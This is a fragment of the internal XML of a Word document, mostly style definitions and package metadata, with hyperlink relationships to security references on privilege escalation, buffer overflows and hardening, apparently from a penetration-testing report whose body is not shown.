      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="3EFF00EC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="3EFF00EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Avenir Next LT Pro"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w: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4C00F2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="004C00F2"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00142A90"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="62"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B1F5B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B1F5B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0099564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02E27"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0087064E"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="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11597">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1081872091">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1345281817">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18504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operating-systems/oracle-linux/6/security/ol_aslr_sec.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00600100_directory-listing"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balt.io/blog/pentester-guide-to-exploiting-buffer-overflow-vulnerabilit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archlinux.org/title/capabiliti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redhat.com/articles/2022/06/02/use-compiler-flags-stack-protection-gcc-and-cla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tfobins.github.io/gtfobins/man/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://andreafortuna.org/2018/05/16/exploiting-sudo-for-linux-privilege-escalation/"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gtfobins.github.io/gtfobins/man/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://access.redhat.com/solutions/293674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src.nist.gov/glossary/term/buffer_overflow" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/548.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32F07-93AA-4303-949E-0BE7547F4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21</Pages>
  <Words>3284</Words>
  <Characters>18724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Bashir</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Joseph Seed</cp:lastModifiedBy>
  <cp:revision>173</cp:revision>
  <cp:lastPrinted>2023-07-24T07:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-20T18:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T07:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>